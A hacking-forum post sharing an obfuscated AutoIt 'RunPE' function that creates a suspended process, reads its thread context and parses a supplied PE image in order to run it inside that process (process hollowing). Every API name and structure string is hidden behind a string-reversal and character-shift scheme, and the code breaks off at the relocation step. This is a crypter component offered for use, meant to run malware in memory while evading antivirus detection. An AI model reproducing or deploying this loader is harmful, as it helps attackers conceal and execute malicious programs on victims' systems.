11 Years of Service
51%
[HIDE-THANKS]It use unique method "ShiftOneLove" with random generated number of char shift for each string and sure classical "StringReverse".
String Reverse -> ShiftOneLove
[/HIDE-THANKS]
String Reverse -> ShiftOneLove
Code:
>;Encrypted by DDoSer
;level23hacktools.com
Func _RunBinary($P30, $F31 = "", $F32 = @AutoItExe)
;#region 1. DETERMINE INTERPRETER TYPE
Local $G33 = @AutoItX64
;#region 2. PREDPROCESSING PASSED
Local $T34 = Binary($P30) ; this is redundant but still...
; Make structure out of binary data that was passed
Local $N36 = DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & BinaryLen($T34) & ShiftOneLove(Revers('69'), 3))
DllStructSetData($N36, 1, $T34) ; fill it
; Get pointer to it
Local $R3130 = DllStructGetPtr($N36)
;#region 3. CREATING NEW PROCESS
; STARTUPINFO structure (actually all that really matters is allocated space)
Local $T3132 = DllStructCreate(ShiftOneLove(Revers('76|901|031|311|19|601|701|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('76|801|901|621|221|901|321|901|09|04|221|421|021'), 8) & _
ShiftOneLove(Revers('16|411|311|811|901|711|301|07|43|611|811|411'), 2) & _
ShiftOneLove(Revers('16|301|011|811|701|68|43|611|811|411'), 2) & _
ShiftOneLove(Revers('66|59|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('46|49|73|501|911|611|421|501'), 5) & _
ShiftOneLove(Revers('76|901|031|311|19|69|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('56|701|821|111|98|59|83|601|021|711|521|601'), 6) & _
ShiftOneLove(Revers('36|911|811|101|801|17|021|411|121|511|17|29|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('66|221|121|401|111|47|321|711|421|811|47|69|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('16|301|811|911|001|701|611|811|811|76|011|011|701|27|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('46|021|801|201|311|57|73|501|911|611|421|501'), 5) & _
ShiftOneLove(Revers('16|121|311|201|211|701|98|121|311|601|58|43|201|611|311|121'), 2) & _
ShiftOneLove(Revers('76|85|801|901|621|221|901|321|901|09|04|801|221|911|721'), 8) & _
ShiftOneLove(Revers('26|35|301|401|121|711|401|811|401|58|53|711|911|511'), 3) & _
ShiftOneLove(Revers('66|321|421|911|711|08|701|321|09|111|93|121|321|911'), 7) & _
ShiftOneLove(Revers('76|421|521|021|421|521|78|801|421|19|211|04|221|421|021'), 8) & _
ShiftOneLove(Revers('611|311|611|611|17|201|811|58|601|43|611|811|411'), 2))
; This is much important. This structure will hold very some important data.
Local $P3133 = DllStructCreate(ShiftOneLove(Revers('06|611|611|201|001|211|511|18|33|511|711|311'), 1) & _
ShiftOneLove(Revers('96|011|701|111|421|411|49|24|421|621|221'), 10) & _
ShiftOneLove(Revers('66|701|08|221|221|801|601|811|121|78|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('401|77|401|101|501|811|801|88|63|401|811|511|321|401'), 4))
; Create new process
Local $J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('19|911|911|501|301|511|811|48|501|021|101|501|811|17'), 4), _
ShiftOneLove(Revers('221|421|321|721'), 8), $F32, _
ShiftOneLove(Revers('221|421|321|721'), 8), $F31, _
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('221|611|111'), 6), 0, _
ShiftOneLove(Revers('801|221|911|721|801'), 8), 4, _ ; CREATE_SUSPENDED ; <- this is essential
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($T3132), _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($P3133))
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed
; Get new process and thread handles:
Local $N3230 = DllStructGetData($P3133, ShiftOneLove(Revers('911|911|501|301|511|811|48'), 4))
Local $O3232 = DllStructGetData($P3133, ShiftOneLove(Revers('201|99|301|611|601|68'), 2))
; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures)
If $G33 And _RunBinary_IsWow64Process($N3230) Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(2, 0, 0)
EndIf
;#region 4. FILL CONTEXT STRUCTURE
; CONTEXT structure is what's really important here. It's processor specific.
Local $R3237, $A3238
If $G33 Then
If @OSArch = ShiftOneLove(Revers('26|46|89'), 10) Then
$R3237 = 2
$A3238 = DllStructCreate(ShiftOneLove(Revers('06|201|011|211|37|55|18|33|35|55|711|111|601|811|33|06|201|011|211|37|45|18|33|35|55|711|111|601|811|33|06|201|011|211|37|35|18|33|35|55|711|111|601|811|33|06|201|011|211|37|25|18|33|35|55|711|111|601|811|33|06|201|011|211|37|15|18|33|35|55|711|111|601|811|33|06|201|011|211|37|05|18|33|35|55|711|111|601|811|33|06|55|05|33|111|401|601|901|89'), 1) & _ ; Register parameter home addresses
ShiftOneLove(Revers('46|911|021|27|521|28|73|501|911|611|421|501|73|46|021|801|201|311|57|121|521|601|121|511|611|27|73|501|911|611|421|501'), 5) & _ ; Control flags
ShiftOneLove(Revers('46|021|801|201|311|57|47|73|501|911|611|421|501|73|46|021|88|801|601|88|73|501|911|611|421|73|46|021|67|801|601|88|73|501|911|611|421|73|46|021|57|801|601|88|73|501|911|611|421|73|46|021|47|801|601|88|73|501|911|611|421|73|46|021|37|801|601|88|73|501|911|611|421|73|46|88|27|801|601|88|73|501|911|611|421'), 5) & _ ; Segment Registers and processor flags
ShiftOneLove(Revers('16|75|611|07|43|45|65|811|211|701|911|43|16|65|611|07|43|45|65|811|211|701|911|43|16|35|611|07|43|45|65|811|211|701|911|43|16|25|611|07|43|45|65|811|211|701|911|43|16|15|611|07|43|45|65|811|211|701|911|43|16|05|611|07|43|45|65|811|211|701|911'), 2) & _ ; Debug registers
ShiftOneLove(Revers('86|26|85|19|14|16|36|521|911|411|621|14|86|16|85|19|14|16|36|521|911|411|621|14|86|06|85|19|14|16|36|521|911|411|621|14|86|95|85|19|14|16|36|521|911|411|621|14|86|85|85|19|14|16|36|521|911|411|621|14|86|75|85|19|14|16|36|521|911|411|621|14|86|66|19|14|16|36|521|911|411|621|14|86|56|19|14|16|36|521|911|411|621|14|86|411|901|19|14|16|36|521|911|411|621|14|86|411|421|19|14|16|36|521|911|411|621|14|86|121|701|19|14|16|36|521|911|411|621|14|86|121|421|19|14|16|36|521|911|411|621|14|86|921|701|19|14|16|36|521|911|411|621|14|86|921|901|19|14|16|36|521|911|411|621|14|86|921|801|19|14|16|36|521|911|411|621|14|86|921|601|19|14|16|36|521|911|411|621'), 9) & _ ; Integer registers
ShiftOneLove(Revers('36|611|901|68|63|65|85|021|411|901|121'), 4) & _ ; Program counter
ShiftOneLove(Revers('06|49|15|29|45|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|35|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|25|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|15|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|05|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|94|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|85|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|75|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|65|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|55|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|45|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|35|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|25|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|15|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|94|011|011|98|33|35|55|711|111|601|811|33|06|49|55|05|29|221|001|89|401|201|77|33|35|55|711|111|601|811|33|06|49|35|29|511|201|101|89|201|37|33|35|55|711|111|601|811'), 1) & _ ; Floating point state (types are not correct for simplicity reasons!!!)
ShiftOneLove(Revers('36|211|511|811|021|411|511|17|811|511|021|301|501|09|63|65|85|021|411|901|121|63|36|79|45|75|59|811|501|021|911|901|701|501|68|811|511|021|301|501|09|63|65|85|021|411|901|121'), 4) & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!)
ShiftOneLove(Revers('411|701|48|111|311|611|27|211|311|701|811|411|301|101|221|17|811|711|99|87|43|45|65|811|211|701|911|43|16|411|701|48|311|68|211|311|701|811|411|301|101|221|17|811|711|99|87|43|45|65|811|211|701|911|43|16|411|701|48|111|311|611|27|601|101|211|99|611|86|811|711|99|87|43|45|65|811|211|701|911|43|16|411|701|48|311|68|601|101|211|99|611|86|811|711|99|87|43|45|65|811|211|701|911|43|16|011|311|611|811|211|311|96|501|911|001|301|07|43|45|65|811|211|701|911'), 2)) ; Special debug control registers
Else
$R3237 = 3
; FIXME - Itanium architecture
; Return special error number:
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(102, 0, 0)
EndIf
Else
$R3237 = 1
$A3238 = DllStructCreate(ShiftOneLove(Revers('26|811|601|001|111|37|911|321|401|911|311|411|07|53|301|711|411|221|301'), 3) & _ ; Control flags
ShiftOneLove(Revers('16|75|611|07|43|201|611|311|121|201|43|16|65|611|07|43|201|611|311|121|201|43|16|35|611|07|43|201|611|311|121|201|43|16|25|611|07|43|201|611|311|121|201|43|16|15|611|07|43|201|611|311|121|201|43|16|05|611|07|43|201|611|311|121|201'), 2) & _ ; CONTEXT_DEBUG_REGISTERS
ShiftOneLove(Revers('06|201|711|89|711|48|121|311|97|94|511|86|33|101|511|211|021|101|33|06|49|94|75|29|89|201|511|66|511|201|711|611|601|401|201|38|33|201|711|221|99|33|06|511|211|711|001|201|901|201|48|89|711|89|96|33|101|511|211|021|101|33|06|711|201|611|301|301|08|89|711|89|96|33|101|511|211|021|101|33|06|511|211|711|001|201|901|201|48|511|211|511|511|07|33|101|511|211|021|101|33|06|711|201|611|301|301|08|511|211|511|511|07|33|101|511|211|021|101|33|06|101|511|211|88|401|89|58|33|101|511|211|021|101|33|06|101|511|211|88|611|811|711|89|711|48|33|101|511|211|021|101|33|06|101|511|211|88|901|211|511|711|111|211|86|33|101|511|211|021|101'), 1) & _ ; CONTEXT_FLOATING_POINT
ShiftOneLove(Revers('46|021|37|801|601|88|73|501|911|611|421|501|73|46|021|47|801|601|88|73|501|911|611|421|501|73|46|021|57|801|601|88|73|501|911|611|421|501|73|46|021|67|801|601|88|73|501|911|611|421|501'), 5) & _ ; CONTEXT_SEGMENTS
ShiftOneLove(Revers('66|721|401|67|93|701|121|811|621|701|93|66|721|601|67|93|701|121|811|621|701|93|66|721|701|67|93|701|121|811|621|701|93|66|721|501|67|93|701|121|811|621|701|93|66|211|221|67|93|701|121|811|621|701|93|66|211|701|67|93|701|121|811|621|701'), 7) & _ ; CONTEXT_INTEGER
ShiftOneLove(Revers('86|421|29|211|011|29|14|901|321|021|821|901|14|86|121|421|87|14|901|321|021|821|901|14|86|421|211|601|711|97|87|14|901|321|021|821|901|14|86|421|67|211|011|29|14|901|321|021|821|901|14|86|121|411|87|14|901|321|021|821|901|14|86|121|701|87|14|901|321|021|821|901'), 9) & _ ; CONTEXT_CONTROL
ShiftOneLove(Revers('99|65|55|95|79|121|021|701|221|121|111|901|701|88|601|701|601|611|701|221|621|57|83|701|221|721|401'), 6)) ; CONTEXT_EXTENDED_REGISTERS
EndIf
; Define CONTEXT_FULL
Local $N3336
Switch $R3237
Case 1
$N3336 = 0x10007
Case 2
$N3336 = 0x100007
Case 3
$N3336 = 0x80027
EndSwitch
; Set desired access
DllStructSetData($A3238, ShiftOneLove(Revers('421|211|601|711|97|521|921|011|521|911|021|67'), 9), $N3336)
; Fill CONTEXT structure:
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|721|801|321|711|811|47|701|401|801|121|111|19|321|801|87'), 7), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $O3232, _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($A3238))
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed
EndIf
; Pointer to PEB structure
Local $W3438
Switch $R3237
Case 1
$W3438 = DllStructGetData($A3238, ShiftOneLove(Revers('421|201|37'), 4))
Case 2
$W3438 = DllStructGetData($A3238, ShiftOneLove(Revers('121|101|38'), 1))
Case 3
; FIXME - Itanium architecture
EndSwitch
;#region 5. READ PE-FORMAT
; Start processing passed binary data. 'Reading' PE format follows.
; First is IMAGE_DOS_HEADER
Local $R3534 = DllStructCreate(ShiftOneLove(Revers('06|49|15|29|001|601|401|89|87|33|511|89|501|001'), 1) & _
ShiftOneLove(Revers('76|901|111|501|88|421|321|501|48|811|78|321|901|421|921|47|04|801|221|911|721'), 8) & _
ShiftOneLove(Revers('06|611|201|401|89|18|33|101|511|211|021'), 1) & _
ShiftOneLove(Revers('56|121|611|711|111|221|301|501|711|411|701|88|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('86|321|011|901|601|011|18|111|021|011|131|411|29|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('56|301|021|221|621|57|511|321|511|111|611|111|38|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('46|201|911|121|521|47|411|221|411|011|521|201|28|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('66|09|09|93|701|121|811|621'), 7) & _
ShiftOneLove(Revers('46|58|88|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('76|711|521|321|511|701|901|211|57|04|801|221|911|721'), 8) & _
ShiftOneLove(Revers('46|58|87|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('96|39|77|24|011|421|121|921'), 10) & _
ShiftOneLove(Revers('86|911|021|411|521|601|801|021|711|011|19|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('06|221|89|901|511|201|911|08|33|101|511|211|021'), 1) & _
ShiftOneLove(Revers('96|301|66|101|011|111|821|421|111|521|111|29|24|421|701|411|901'), 10) & _
ShiftOneLove(Revers('56|021|701|111|801|111|221|611|701|601|97|38|57|58|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('76|811|911|311|421|501|711|221|911|011|811|18|58|77|78|04|801|221|911|721'), 8) & _
ShiftOneLove(Revers('56|99|45|65|79|65|601|701|421|021|701|121|701|88|83|021|301|011|501'), 6) & _
ShiftOneLove(Revers('811|501|401|101|501|67|501|421|37|321|501|28|601|38|911|911|501|811|401|401|96|63|401|811|511|321|401'), 4), _
$R3130)
; Save this pointer value (it's starting address of binary image headers)
Local $N3536 = $R3130
; Move pointer
$R3130 += DllStructGetData($R3534, ShiftOneLove(Revers('611|301|201|99|301|47|301|221|17|121|301|08|401|18|711|711|301|611|201|201|76'), 2)) ; move to PE file header
; Get ShiftOneLove(Revers('901|511|311|701|78'), 10)
Local $P3630 = DllStructGetData($R3534, ShiftOneLove(Revers('901|511|311|701|78'), 10))
; Check if it's valid format
If Not ($P3630 == ShiftOneLove(Revers('99|68'), 9)) Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(4, 0, 0) ; MS-DOS header missing.
EndIf
; In place of IMAGE_NT_SIGNATURE
Local $S3634 = DllStructCreate(ShiftOneLove(Revers('801|121|421|321|401|711|011|211|09|93|701|121|811|621|701'), 7), $R3130)
; Move pointer
$R3130 += 4 ; size of $S3634 structure
; Check signature
If DllStructGetData($S3634, ShiftOneLove(Revers('901|221|521|421|501|811|111|311|19'), 8)) <> 17744 Then ; IMAGE_NT_SIGNATURE
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(5, 0, 0) ; wrong signature. For PE image should be ShiftOneLove(Revers('94|39|94|39|07|18'), 1) or 17744 dword.
EndIf
; In place of IMAGE_FILE_HEADER
Local $F3730 = DllStructCreate(ShiftOneLove(Revers('66|801|711|211|111|601|401|48|93|701|121|811|621'), 7) & _
ShiftOneLove(Revers('26|811|311|411|801|911|201|401|68|501|28|711|401|101|211|021|18|53|301|711|411|221'), 3) & _
ShiftOneLove(Revers('16|411|111|99|811|58|301|811|99|07|301|111|701|68|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('46|601|311|301|201|98|311|611|301|411|621|88|611|98|911|601|121|511|011|611|58|73|501|911|611|421|501'), 5) & _
ShiftOneLove(Revers('06|611|901|211|99|011|221|48|301|08|511|201|99|011|811|97|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('96|421|111|011|701|111|28|811|701|021|121|511|621|221|98|211|98|111|231|511|39|24|011|421|121|921'), 10) & _
ShiftOneLove(Revers('521|901|511|621|521|511|421|111|621|901|701|421|701|411|77|24|011|421|121|921'), 10), _
$R3130)
; I could check here if the module is relocatable
; Local $S3734
; If BitAND(DllStructGetData($F3730, ShiftOneLove(Revers('321|701|311|421|321|311|221|901|421|701|501|221|501|211|57'), 8)), 1) Then $S3734 = False
; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead)
; Get number of sections
Local $N3735 = DllStructGetData($F3730, ShiftOneLove(Revers('121|611|711|111|221|501|701|98|801|58|021|701|401|511|321|48'), 6))
; Move pointer
$R3130 += 20 ; size of $F3730 structure
; In place of IMAGE_OPTIONAL_HEADER
Local $W3739 = DllStructCreate(ShiftOneLove(Revers('86|801|411|211|601|68|14|901|321|021|821'), 9), $R3130)
Local $X3831 = DllStructGetData($W3739, 1)
Local $C3833
If $X3831 = 267 Then ; x86 version
If $G33 Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
$C3833 = DllStructCreate(ShiftOneLove(Revers('86|801|411|211|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('76|811|911|311|321|221|901|49|221|901|511|811|311|48|221|911|411|501|58|04|901|421|921|601'), 8) & _
ShiftOneLove(Revers('16|211|311|701|711|611|301|88|611|301|901|211|701|87|611|311|211|701|97|43|301|811|321|001'), 2) & _
ShiftOneLove(Revers('36|501|401|511|17|601|38|501|621|901|78|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('36|101|021|101|27|401|501|621|901|211|101|901|021|901|411|77|601|38|501|621|901|78|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('96|701|621|701|87|011|111|231|511|811|701|511|621|511|021|511|021|59|211|98|111|231|511|39|24|011|421|121|921|011'), 10) & _
ShiftOneLove(Revers('16|811|211|701|311|28|321|611|811|211|17|401|18|711|711|301|611|201|201|76|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('76|901|801|911|57|011|78|901|321|501|47|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('56|301|221|301|47|801|58|701|121|301|27|83|601|021|711|521|601'), 6) & _
ShiftOneLove(Revers('76|901|321|501|47|901|111|501|711|18|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('06|711|111|201|011|111|401|601|901|66|111|211|601|711|001|201|48|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('26|911|311|401|211|311|601|801|111|86|401|111|801|37|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('86|911|021|411|421|321|011|59|811|011|521|421|031|29|211|911|411|521|601|321|011|121|88|321|021|511|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('36|411|511|901|911|811|501|09|311|501|021|911|521|78|701|411|901|021|101|811|501|611|38|811|511|411|901|18|63|401|811|511|321'), 4) & _
ShiftOneLove(Revers('36|411|511|901|911|811|501|09|501|701|101|311|77|811|511|011|101|18|63|401|811|511|321'), 4) & _
ShiftOneLove(Revers('46|511|611|011|021|911|601|19|601|801|201|411|87|911|611|511|011|28|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('86|911|021|411|421|321|011|59|811|011|521|421|031|421|701|621|29|321|021|511|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('56|611|711|111|121|021|701|29|511|701|221|121|721|121|401|321|98|021|711|611|111|38|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('86|011|621|711|601|59|911|021|411|421|321|011|59|95|06|911|411|69|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('66|801|011|401|611|08|901|68|801|921|211|09|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('06|611|511|201|101|89|201|37|301|08|201|321|601|48|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('36|311|121|78|111|301|501|801|17|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('66|611|801|321|221|821|221|501|421|09|93|701|121|811|621'), 7) & _
ShiftOneLove(Revers('86|421|801|411|521|421|411|321|011|521|801|601|321|601|311|67|711|711|77|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('86|011|721|321|011|421|011|19|611|801|601|521|29|111|88|011|131|411|29|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('96|621|511|911|911|121|77|711|901|701|621|39|211|98|111|231|511|39|24|011|421|121|921|011'), 10) & _
ShiftOneLove(Revers('16|301|021|611|301|711|301|48|411|99|301|47|401|18|301|421|701|58|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('16|811|701|111|111|311|96|411|99|301|47|401|18|301|421|701|58|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('26|811|601|001|111|37|711|401|301|001|411|97|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('911|501|621|901|78|401|411|96|101|221|68|601|38|811|501|201|311|121|28|63|401|811|511|321|401'), 4), _
$R3130)
; Move pointer
$R3130 += 96 ; size of $C3833
ElseIf $X3831 = 523 Then ; x64 version
If Not $G33 Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
$C3833 = DllStructCreate(ShiftOneLove(Revers('86|801|411|211|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('76|811|911|311|321|221|901|49|221|901|511|811|311|48|221|911|411|501|58|04|901|421|921|601'), 8) & _
ShiftOneLove(Revers('16|211|311|701|711|611|301|88|611|301|901|211|701|87|611|311|211|701|97|43|301|811|321|001'), 2) & _
ShiftOneLove(Revers('36|501|401|511|17|601|38|501|621|901|78|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('36|101|021|101|27|401|501|621|901|211|101|901|021|901|411|77|601|38|501|621|901|78|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('96|701|621|701|87|011|111|231|511|811|701|511|621|511|021|511|021|59|211|98|111|231|511|39|24|011|421|121|921|011'), 10) & _
ShiftOneLove(Revers('16|811|211|701|311|28|321|611|811|211|17|401|18|711|711|301|611|201|201|76|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('76|901|801|911|57|011|78|901|321|501|47|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('26|401|811|001|96|401|601|001|211|67|53|55|75|911|311|801|021'), 3) & _
ShiftOneLove(Revers('06|711|111|201|011|111|401|601|901|66|111|211|601|711|001|201|48|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('26|911|311|401|211|311|601|801|111|86|401|111|801|37|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('86|911|021|411|421|321|011|59|811|011|521|421|031|29|211|911|411|521|601|321|011|121|88|321|021|511|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('36|411|511|901|911|811|501|09|311|501|021|911|521|78|701|411|901|021|101|811|501|611|38|811|511|411|901|18|63|401|811|511|321'), 4) & _
ShiftOneLove(Revers('36|411|511|901|911|811|501|09|501|701|101|311|77|811|511|011|101|18|63|401|811|511|321'), 4) & _
ShiftOneLove(Revers('46|511|611|011|021|911|601|19|601|801|201|411|87|911|611|511|011|28|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('86|911|021|411|421|321|011|59|811|011|521|421|031|421|701|621|29|321|021|511|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('56|611|711|111|121|021|701|29|511|701|221|121|721|121|401|321|98|021|711|611|111|38|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('86|011|621|711|601|59|911|021|411|421|321|011|59|95|06|911|411|69|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('66|801|011|401|611|08|901|68|801|921|211|09|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('06|611|511|201|101|89|201|37|301|08|201|321|601|48|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('36|311|121|78|111|301|501|801|17|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('66|611|801|321|221|821|221|501|421|09|93|701|121|811|621'), 7) & _
ShiftOneLove(Revers('86|421|801|411|521|421|411|321|011|521|801|601|321|601|311|67|711|711|77|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('36|501|221|811|501|911|501|68|111|301|101|021|78|601|38|501|621|901|78|63|65|85|021|411|901|121'), 4) & _
ShiftOneLove(Revers('46|121|011|411|411|611|27|211|401|201|121|88|701|48|601|721|011|88|73|75|95|121|511|011|221'), 5) & _
ShiftOneLove(Revers('66|801|521|121|801|221|801|98|911|401|801|97|901|68|801|921|211|09|93|95|16|321|711|211|421'), 7) & _
ShiftOneLove(Revers('06|711|601|011|011|211|86|311|89|201|37|301|08|201|321|601|48|33|35|55|711|111|601|811'), 1) & _
ShiftOneLove(Revers('26|811|601|001|111|37|711|401|301|001|411|97|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('911|501|621|901|78|401|411|96|101|221|68|601|38|811|501|201|311|121|28|63|401|811|511|321|401'), 4), _
$R3130)
; Move pointer
$R3130 += 112 ; size of $C3833
Else
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
; Extract entry point address
Local $L3939 = DllStructGetData($C3833, ShiftOneLove(Revers('811|211|701|311|28|321|611|811|211|17|401|18|711|711|301|611|201|201|76'), 2)) ; if loaded binary image would start executing at this address
; And other interesting informations
Local $S313031 = DllStructGetData($C3833, ShiftOneLove(Revers('911|811|501|401|101|501|67|601|38|501|621|901|78'), 4))
Local $M313033 = DllStructGetData($C3833, ShiftOneLove(Revers('601|021|201|17|601|801|201|411|87'), 5)) ; address of the first byte of the image when it's loaded in memory
Local $H313035 = DllStructGetData($C3833, ShiftOneLove(Revers('901|111|501|711|18|011|78|901|031|311|19'), 8)) ; the size of the image including all headers
; Move pointer
$R3130 += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT
$R3130 += 8 ; size of $J313039
$R3130 += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY
; Base Relocation Directory
